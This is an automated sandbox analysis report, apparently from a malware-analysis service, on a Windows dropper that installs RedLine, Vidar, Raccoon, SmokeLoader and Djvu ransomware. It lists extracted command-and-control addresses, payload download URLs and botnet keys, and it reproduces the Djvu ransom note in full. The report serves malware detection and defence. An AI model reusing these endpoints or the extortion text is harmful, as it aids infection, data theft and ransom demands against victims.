djvu | f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1

Analysis

max time kernel
46s
max time network
158s
platform
windows10-2004_x64
resource
win10v2004-20220310-en
submitted
13-03-2022 17:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe
Size

9.1MB
MD5

588995b6cc1aecbdf93baf244ff561fb
SHA1

4bc33132cac44d37acf081db9519ab3c3f974d07
SHA256

f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1
SHA512

c49dd7f0b56033d944a4b743fefcb303947473d93156d7a244ef9c101c86f5dab2391323a51fa0079b5b7b3ad0165cc7c1c7fa3e2fa05441014a42bcf34dbb6c

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.wygexde.xyz/

Extracted

Family

vidar

Version

39.8

Botnet

933

https://xeronxikxxx.tumblr.com/

Attributes

profile_id
933

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

raccoon

Version

1.7.3

Botnet

92be0387873e54dd629b9bfa972c3a9a88e6726c

Attributes

url4cnc
https://t.me/gishsunsetman

rc4.plain

Extracted

Family

redline

Botnet

ruzki000

86.107.197.196:63065

Attributes

auth_value
80fac7f67bd38aa709bbeef7a44ccb47

Extracted

Family

redline

Botnet

Installs

94.23.1.92:12857

Attributes

auth_value
c8e146507a5c0004dfcc77a7c5f15bc2

Extracted

Family

redline

Botnet

ruzki12_03

176.122.23.55:11768

Attributes

auth_value
c51ddc8008e8581a01cec6e8291c5530

Extracted

Family

redline

Botnet

pizzadlyashekera

65.108.101.231:14648

Attributes

auth_value
7d6b3cb15fc835e113d8c22bd7cfe2b4

Extracted

Family

redline

Botnet

ruz876

185.215.113.7:5186

Attributes

auth_value
4750f6742a496bbe74a981d51e7680ad

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Signatures

Detected Djvu ransomware 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2984-336-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2984-342-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2984-347-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2984-338-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1484-179-0x0000000003A20000-0x0000000004346000-memory.dmp	family_glupteba
behavioral2/memory/1484-183-0x0000000000400000-0x0000000001844000-memory.dmp	family_glupteba
behavioral2/memory/2664-211-0x0000000000400000-0x0000000001844000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3884 4864 rUNdlL32.eXe
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3884	4864	rUNdlL32.eXe

Raccoon Stealer Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4996-204-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/4996-210-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/4996-212-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 11 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Documents\ZcFmoaFtKcbvTKLuwMYn3EJy.exe	family_redline
behavioral2/memory/5144-263-0x0000000000920000-0x0000000000AD4000-memory.dmp	family_redline
behavioral2/memory/5144-262-0x0000000000920000-0x0000000000AD4000-memory.dmp	family_redline
behavioral2/memory/5144-276-0x0000000000920000-0x0000000000AD4000-memory.dmp	family_redline
behavioral2/memory/5144-273-0x0000000000920000-0x0000000000AD4000-memory.dmp	family_redline
C:\Users\Admin\Documents\ZcFmoaFtKcbvTKLuwMYn3EJy.exe	family_redline
behavioral2/memory/4052-236-0x00000000002A0000-0x00000000002C0000-memory.dmp	family_redline
behavioral2/memory/5684-301-0x0000000000630000-0x0000000000650000-memory.dmp	family_redline
behavioral2/memory/5724-304-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/4788-300-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/6028-326-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 1980 created 1484 1980 svchost.exe Info.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata

description	pid	process	target process
PID 1980 created 1484	1980	svchost.exe	Info.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1160-281-0x0000000001FA0000-0x0000000001FE4000-memory.dmp	family_onlylogger
behavioral2/memory/1160-283-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/2756-173-0x0000000000400000-0x000000000146C000-memory.dmp	family_vidar
behavioral2/memory/2756-174-0x00000000030A0000-0x000000000313D000-memory.dmp	family_vidar

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 16 IoCs

Processes:

Files.exeKRSetp.exejfiag3g_gg.exeInstall.exeFolder.exeInfo.execleanpro22.exepub2.exejamesdirect.exeLitever01.exeComplete.exemd9_1sjm.exeFolder.exejfiag3g_gg.exeInfo.exeWerFault.exe

pid	process
1932	Files.exe
5108	KRSetp.exe
2764	jfiag3g_gg.exe
4660	Install.exe
2088	Folder.exe
1484	Info.exe
1204	cleanpro22.exe
4996	pub2.exe
5060	jamesdirect.exe
2756	Litever01.exe
5044	Complete.exe
1572	md9_1sjm.exe
1176	Folder.exe
2008	jfiag3g_gg.exe
2664	Info.exe
4996	WerFault.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect
behavioral2/memory/1572-165-0x0000000000400000-0x000000000067D000-memory.dmp	vmprotect
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe	vmprotect

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exeFolder.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Folder.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

1996 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1996	rundll32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

14 ip-api.com
30 ipinfo.io
355 ipinfo.io
417 ipinfo.io
418 ipinfo.io
22 ipinfo.io
23 ipinfo.io
31 ipinfo.io
239 ipinfo.io
240 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of SetThreadContext 1 IoCs

Processes:

jamesdirect.exe

description pid process target process

PID 5060 set thread context of 4996 5060 jamesdirect.exe WerFault.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
14	ip-api.com
30	ipinfo.io
355	ipinfo.io
417	ipinfo.io
418	ipinfo.io
22	ipinfo.io
23	ipinfo.io
31	ipinfo.io
239	ipinfo.io
240	ipinfo.io

description	pid	process	target process
PID 5060 set thread context of 4996	5060	jamesdirect.exe	WerFault.exe

Program crash 30 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4152	1996	WerFault.exe	rundll32.exe
4420	1484	WerFault.exe	Info.exe
5872	3924	WerFault.exe
6056	1160	WerFault.exe
932	4996	WerFault.exe	jamesdirect.exe
4584	3924	WerFault.exe	depIRPXaBcBVNG2fNvs28o2a.exe
5872	1160	WerFault.exe	YBXuJnDqJGmEsY2o7kQrLiyx.exe
6316	1160	WerFault.exe	YBXuJnDqJGmEsY2o7kQrLiyx.exe
3888	2984	WerFault.exe	5WlMHDUEWHAVy_Aw1i_M5EId.exe
6484	1208	WerFault.exe	kUJCwmhaf1LMu4wu3QB22Y4R.exe
6624	5136	WerFault.exe	lFtkYj3JomqnDGFaI6vW1Out.exe
4160	5804	WerFault.exe	4aR_6HU2X9CRul7WauzMAubZ.exe
6196	1160	WerFault.exe	YBXuJnDqJGmEsY2o7kQrLiyx.exe
7024	5136	WerFault.exe	lFtkYj3JomqnDGFaI6vW1Out.exe
6240	6012	WerFault.exe	B8xLd1qqeIXd2B3T3_zjOdAb.exe
6444	5804	WerFault.exe	4aR_6HU2X9CRul7WauzMAubZ.exe
6740	1160	WerFault.exe	YBXuJnDqJGmEsY2o7kQrLiyx.exe
7128	3288	WerFault.exe	NcIvtNJzfxfQPDM_1hPpUQbL.exe
6648	1160	WerFault.exe	YBXuJnDqJGmEsY2o7kQrLiyx.exe
3912	5804	WerFault.exe	4aR_6HU2X9CRul7WauzMAubZ.exe
4788	1160	WerFault.exe	YBXuJnDqJGmEsY2o7kQrLiyx.exe
6140	5804	WerFault.exe	4aR_6HU2X9CRul7WauzMAubZ.exe
5216	5804	WerFault.exe	4aR_6HU2X9CRul7WauzMAubZ.exe
3016	1160	WerFault.exe	YBXuJnDqJGmEsY2o7kQrLiyx.exe
5768	5908	WerFault.exe	iOWORGY85aplQ1praPvhwNzJ.exe
5836	2664	WerFault.exe	Info.exe
5160	5908	WerFault.exe	iOWORGY85aplQ1praPvhwNzJ.exe
4600	3068	WerFault.exe	Ad5eCdgygglsXjNQXE8ADY4G.exe
3644	4472	WerFault.exe	siww1049.exe
6484	5908	WerFault.exe	iOWORGY85aplQ1praPvhwNzJ.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

6524 schtasks.exe
5908 schtasks.exe
3184 schtasks.exe
5908 schtasks.exe
5380 schtasks.exe
1296 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

6300 timeout.exe
3492 timeout.exe

pid	process
6524	schtasks.exe
5908	schtasks.exe
3184	schtasks.exe
5908	schtasks.exe
5380	schtasks.exe
1296	schtasks.exe

pid	process
6300	timeout.exe
3492	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4100 taskkill.exe
3928 taskkill.exe
1620 taskkill.exe
5988 taskkill.exe

pid	process
4100	taskkill.exe
3928	taskkill.exe
1620	taskkill.exe
5988	taskkill.exe

Modifies registry class 4 IoCs

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Litever01.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Litever01.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Litever01.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exejfiag3g_gg.exe

pid	process
4996	pub2.exe
4996	pub2.exe
2008	jfiag3g_gg.exe
2008	jfiag3g_gg.exe
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060
3060

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

4996 pub2.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

Processes:

msedge.exe

pid process

5024 msedge.exe
5024 msedge.exe

pid	process
5024	msedge.exe
5024	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

KRSetp.exeInstall.exetaskkill.exemd9_1sjm.exeInfo.exesvchost.exejamesdirect.exe

description	pid	process
Token: SeDebugPrivilege	5108	KRSetp.exe
Token: SeCreateTokenPrivilege	4660	Install.exe
Token: SeAssignPrimaryTokenPrivilege	4660	Install.exe
Token: SeLockMemoryPrivilege	4660	Install.exe
Token: SeIncreaseQuotaPrivilege	4660	Install.exe
Token: SeMachineAccountPrivilege	4660	Install.exe
Token: SeTcbPrivilege	4660	Install.exe
Token: SeSecurityPrivilege	4660	Install.exe
Token: SeTakeOwnershipPrivilege	4660	Install.exe
Token: SeLoadDriverPrivilege	4660	Install.exe
Token: SeSystemProfilePrivilege	4660	Install.exe
Token: SeSystemtimePrivilege	4660	Install.exe
Token: SeProfSingleProcessPrivilege	4660	Install.exe
Token: SeIncBasePriorityPrivilege	4660	Install.exe
Token: SeCreatePagefilePrivilege	4660	Install.exe
Token: SeCreatePermanentPrivilege	4660	Install.exe
Token: SeBackupPrivilege	4660	Install.exe
Token: SeRestorePrivilege	4660	Install.exe
Token: SeShutdownPrivilege	4660	Install.exe
Token: SeDebugPrivilege	4660	Install.exe
Token: SeAuditPrivilege	4660	Install.exe
Token: SeSystemEnvironmentPrivilege	4660	Install.exe
Token: SeChangeNotifyPrivilege	4660	Install.exe
Token: SeRemoteShutdownPrivilege	4660	Install.exe
Token: SeUndockPrivilege	4660	Install.exe
Token: SeSyncAgentPrivilege	4660	Install.exe
Token: SeEnableDelegationPrivilege	4660	Install.exe
Token: SeManageVolumePrivilege	4660	Install.exe
Token: SeImpersonatePrivilege	4660	Install.exe
Token: SeCreateGlobalPrivilege	4660	Install.exe
Token: 31	4660	Install.exe
Token: 32	4660	Install.exe
Token: 33	4660	Install.exe
Token: 34	4660	Install.exe
Token: 35	4660	Install.exe
Token: SeDebugPrivilege	4100	taskkill.exe
Token: SeManageVolumePrivilege	1572	md9_1sjm.exe
Token: SeDebugPrivilege	1484	Info.exe
Token: SeImpersonatePrivilege	1484	Info.exe
Token: SeManageVolumePrivilege	1572	md9_1sjm.exe
Token: SeTcbPrivilege	1980	svchost.exe
Token: SeTcbPrivilege	1980	svchost.exe
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeManageVolumePrivilege	1572	md9_1sjm.exe
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeManageVolumePrivilege	1572	md9_1sjm.exe
Token: SeDebugPrivilege	5060	jamesdirect.exe
Token: SeShutdownPrivilege	3060
Token: SeCreatePagefilePrivilege	3060
Token: SeShutdownPrivilege	3060

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msedge.exe

pid process

3060
3060
5024 msedge.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

cleanpro22.exeComplete.exe

pid process

1204 cleanpro22.exe
5044 Complete.exe

pid	process
3060
3060
5024	msedge.exe

pid	process
1204	cleanpro22.exe
5044	Complete.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exeFiles.exemsedge.exeFolder.exeInstall.execmd.exerUNdlL32.eXe

description	pid	process	target process
PID 3136 wrote to memory of 1932	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Files.exe
PID 3136 wrote to memory of 1932	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Files.exe
PID 3136 wrote to memory of 1932	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Files.exe
PID 3136 wrote to memory of 5108	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	KRSetp.exe
PID 3136 wrote to memory of 5108	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	KRSetp.exe
PID 1932 wrote to memory of 2764	1932	Files.exe	jfiag3g_gg.exe
PID 1932 wrote to memory of 2764	1932	Files.exe	jfiag3g_gg.exe
PID 1932 wrote to memory of 2764	1932	Files.exe	jfiag3g_gg.exe
PID 3136 wrote to memory of 5024	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	msedge.exe
PID 3136 wrote to memory of 5024	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	msedge.exe
PID 3136 wrote to memory of 4660	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Install.exe
PID 3136 wrote to memory of 4660	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Install.exe
PID 3136 wrote to memory of 4660	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Install.exe
PID 3136 wrote to memory of 2088	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Folder.exe
PID 3136 wrote to memory of 2088	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Folder.exe
PID 3136 wrote to memory of 2088	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Folder.exe
PID 5024 wrote to memory of 1268	5024	msedge.exe	msedge.exe
PID 5024 wrote to memory of 1268	5024	msedge.exe	msedge.exe
PID 3136 wrote to memory of 1484	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Info.exe
PID 3136 wrote to memory of 1484	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Info.exe
PID 3136 wrote to memory of 1484	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	Info.exe
PID 3136 wrote to memory of 1204	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	cleanpro22.exe
PID 3136 wrote to memory of 1204	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	cleanpro22.exe
PID 3136 wrote to memory of 1204	3136	f17bb80379ea6a986f7ed7b40cf16f73d3c0daa263b170ebf781c8c624279fe1.exe	cleanpro22.exe
